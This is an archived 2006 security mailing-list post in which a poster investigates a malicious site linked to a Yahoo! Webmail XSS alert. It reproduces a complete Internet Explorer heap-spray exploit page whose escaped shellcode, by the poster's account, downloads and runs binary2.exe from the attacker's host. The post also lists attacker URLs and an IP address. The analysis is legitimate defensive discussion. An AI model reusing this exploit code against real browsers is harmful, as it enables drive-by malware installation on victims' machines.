|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Dailydave] RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: C programming List (cprog.list
gmail.com)
Date: Tue Apr 18 2006 - 16:54:23 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> The top page a level above that is quite interesting too. Although I'd only
>recommend browsing it with wget and notepad, to be on the safe side. Should
>someone perhaps notify all those banks mentioned? (Then again, telling them
>"Watch out for suspicious CC transactions from eastern European nations"
>probably isn't telling them anything they don't already know....)
>
>
> cheers,
> DaveK
Looking at the front page on my regular browsers(firefox, galeon,
konqueror) the 3 die, apparently from what I see, the browser
makes repetitive call to mmap2
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x8af82000
I dont know what he wants, but apparently is just to map as much
memory as possible. Anyone knows what script he uses to generate this
?
THere is also http://www.w00tynetwork.com/news.htm which has what I
beleive is an IE explorer exploit, maybe another browser, but windows
oriented.
<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">
shellcode = unescape(
"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000)
block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;
var r = document.getElementById('javascript').createTextRange();
</script>
This shellcode downloads and execs this binary
http://www.w00tynetwork.com/binary2.exe. Anyone knows what the binary
does ?
Ive tried to get the file that the xss is going to download but the
address never replies.
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a comany named Ceraco International Co., Ltd.
Which I guess is s drone..
Anyone has any more on this web?
-daniel
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]